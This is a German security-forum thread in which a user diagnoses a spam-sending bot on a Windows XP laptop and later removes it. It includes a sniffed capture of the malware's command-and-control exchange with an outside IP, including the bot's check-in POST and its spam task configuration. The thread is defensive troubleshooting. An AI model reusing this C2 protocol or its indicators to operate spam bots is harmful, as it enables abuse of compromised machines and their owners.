Hilfe: Rechner versendet automatisch Mails !!!

Dieses Thema im Forum "Sicherheit" wurde erstellt von tz_redfox, 1. Januar 2006.

Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. tz_redfox

    tz_redfox Byte

    Registriert seit:
    11. November 2005
    Beiträge:
    10
    Hi ,

    seit ca. zwei Tagen versendet mein Rechner offenbar Mails.

    Ich dachte dabei sofort an einen Virus, Tojaner oder so. Aber so einfach ist das nicht.

    Mit einem Sniffer habe ich mal nachgeschaut.

    1.) Mein System versucht ca. alle 180 Sekunden die IP Adresse: 64.62.243.62 zu erreichen.
    2.) Von dort werden über HTTP eMail Listen und Nachrichten geladen. Hier mal ein Auszug aus dem Sniff:

    -------------------snip-----------
    POST /cgi-bin/login.pl HTTP/1.1
    Host: ftp.quotes-info.cc
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 124
    Connection: Close

    file=Speed=+112969%0D%0AOS=+Microsoft+Windows+XP+Service+Pack+2%0D%0AId=+3A48D147BA52B464FC8F2B4BD20D94B8%0D%0AVer=+23%0D%0A1Š
    HTTP/1.1 200 OK
    Content-Length: 530
    Content-Type: text/plain
    Server: mailware.embedded/0.9

    TaskId=Goodz 1of3-43b46658
    Magic=43b68b3e-000a6434-4a3e32fc
    Threads=7
    CpyCountMin=0
    CpyCountMax=0
    AnyDomain=0
    WithErrors=0
    Verify=0
    ConnectTimeout=20
    SMTPTimeout=20
    DataTimeout=30
    Maillist=http://64.62.243.62/GetDoze?magic=43b68b3e-000a6434-4a3e32fc
    MailText=http://64.62.243.62/GetBody?magic=43b68b3e-000a6434-4a3e32fc
    BadStrings=http://64.62.243.62/files/bad.txt
    UnluckyStrings=http://64.62.243.62/files/unlucky.txt
    FilesURL=http://64.62.243.62/files/
    FilesNames=domains.txt,first.txt,last.txt1

    -------------------snip-----------

    3.) Danach werden dann diese Mails scheinen dann versendet.

    Bisher half nur das Blocken der IP Adresse in meinem DSL Router.

    Aber wer oder was versendet diese Mails von meinem System und woher kommt der Dreck?

    Alle Tool: AntiVir, HiJack, A2, die Microsoft Tools, oder Spybot haben nichts gefunden.

    Aber das System Sendet.

    Irgend eine Idee?

    Ach so, habe hier ein XP Prof. mit SP2, allen MS Patches, Firefox 1.5 und aktiven AntiVir Scanner. Da wird mir schon unheimlich.
     
  2. steppl

    steppl Halbes Gigabyte

    Registriert seit:
    30. Juni 2004
    Beiträge:
    6.613
    Na und?

    Ja, Virus mit eigener SMTP-Engine. Dein Rechner scheint zu einer Spamschleuder mutiert zu sein. Ihh, geh weg :D

    EDIT: Die IP taucht im Zusammenhang mit einer Webseite im Ostblock (genauer: Ungarn) auf.
     
  3. tz_redfox

    tz_redfox Byte

    Registriert seit:
    11. November 2005
    Beiträge:
    10
    Hi steppl,

    danke für Deinen hilfreichen Hinweis.

    Das auf meinem System eine von mir nicht gewollte SMTP-Engine läuft hatte ich bereits in meiner Frage beschrieben. (Siehe 3.))

    Ich würde die aber gern wieder vom System kicken, kann Sie aber nicht finden.

    Dazu eine Idee?

    Ciao
    tz_redfox
     
  4. linuxpaule

    linuxpaule Byte

    Registriert seit:
    1. Januar 2006
    Beiträge:
    35
    @steppl
    wenn ich die ip adresse suche komme ich nach
    MarketPostTower datacenter, San Jose, CA, USA
    und nicht nach ungarn!!!
    außer er benutzt den als proxi
    hier die dazugehörige webadresse zu der ip:
    http://mccolo.com/english/ ist der horster von 64.62.243.62
     
  5. Michi0815

    Michi0815 Guest

    Registriert seit:
    7. Januar 2004
    Beiträge:
    3.429
    deinem vorgehen nach zu urteilen traue ich dir zu "merkwürdige" prozesse im taskmanager zu finden. daher tippe ich einfach mal auf ein rootkit, das den mailbot tarnt. wer weiss was sich da sonst noch alles eingenistet hat...

    ich würde daher zur neuinstallation raten :(
     
  6. tz_redfox

    tz_redfox Byte

    Registriert seit:
    11. November 2005
    Beiträge:
    10
    Hi,ich wollte nicht aufgeben und habe es gefunden.

    Nach endlosen Versuchen habe ich ein Tool gefunden, welches meinen Schädling erkennen konnte.

    Der Schädling war:

    Win32.MailBot.b und oder Win32.MailBot.q

    leider konnte ich dazu keine weitere Beschreibung finden.

    Obwohl anderen "MailScanner" diesen ebenfalls erkennen sollten, z.b. "AntiVir" haben sie es nicht getan. Erst "ewido anti-malware" (http://www.ewido.net) hatte den Schädling gefunden und konnte ihn aus meinen System löschen.:)


    Ciao
    tz_redfox
     
  7. michag

    michag Kbyte

    Registriert seit:
    30. September 2002
    Beiträge:
    299
    hello,

    wie kommt man auf sowas?
    ich meine, hat die firewall dir das gemeldet oder woher hast du das bemerkt?

    ich will mit der frage versuchen zu klären, was ein user macht der nicht so bewandert ist....

    mg
     
  8. steppl

    steppl Halbes Gigabyte

    Registriert seit:
    30. Juni 2004
    Beiträge:
    6.613
    Wenn man einen Volumentarif hat, merkt man es an der Rechnung..:D
     
  9. michag

    michag Kbyte

    Registriert seit:
    30. September 2002
    Beiträge:
    299
    japp,

    aber er hats ja nach 2 tagen gemerkt.
    insofern ist das wissen darum interessant, zumal nicht jeder so glücklich ist nen volumentarif zu haben.
    soll ja auch n paar arme shweine geben, die mit ner flat arbeiten.
    :)
    also hier nochmal meine fragen:

    f1: wie hast du die infizierung bemerkt?

    und spasseshalber noch

    f2: wie hast du dir das eingefangen?

    grussle

    mg
     
  10. tz_redfox

    tz_redfox Byte

    Registriert seit:
    11. November 2005
    Beiträge:
    10
    Hi michag,

    es handelte sich um meinen Laptop und da habe ich einen USB WLAN Adapter für meinen Internetzugang.

    Gemerkt habe ich es daran, dass die LED am USB Adapter wie wild blinkte, ohne dass ein Program gestartet war.

    Hatte dann die offenen TCP Verbindungeen überprüft und siehe da, lauter ausgehende zu mir unbekannten Adressen. (aports.exe)


    Danach einmal mit einem Sniffer (Ethereal) den Trafic mitgeschnitten und drübergeschaut.

    Es war also mehr Zufall als Absicht.

    Wie das Teil auf mein System gelangt ist, bleibt mir weiterhin unklar. Bisher war ich immer auf Sicherheit bedacht. Alle Patches einspielen, unbekannte Mail werden sowieso gleich gelöscht und die Datenbank meines Virenscanner ist nie älter als eine Woche und doch, irgend wie hatte ich mir das Ding eingefangen.

    Ich werde mir wohl doch mal eine Partition mit Linux zum Surfen einrichten.

    Ciao
    tz_redfox
     
  11. michag

    michag Kbyte

    Registriert seit:
    30. September 2002
    Beiträge:
    299
    danke für deine ausführungen...


    ich finde es wichtig mal so nen "erfahrungsbericht" zu lesen.
    man denkt ja immer man ist "geschützt", aber wenn ich sowas lese...
    :mad:
    ich geh mal davon aus, dass du einigermassen vorsichtig bist/warst...

    man lernt eben nie aus

    mg
     
Status des Themas:
Es sind keine weiteren Antworten möglich.

Diese Seite empfehlen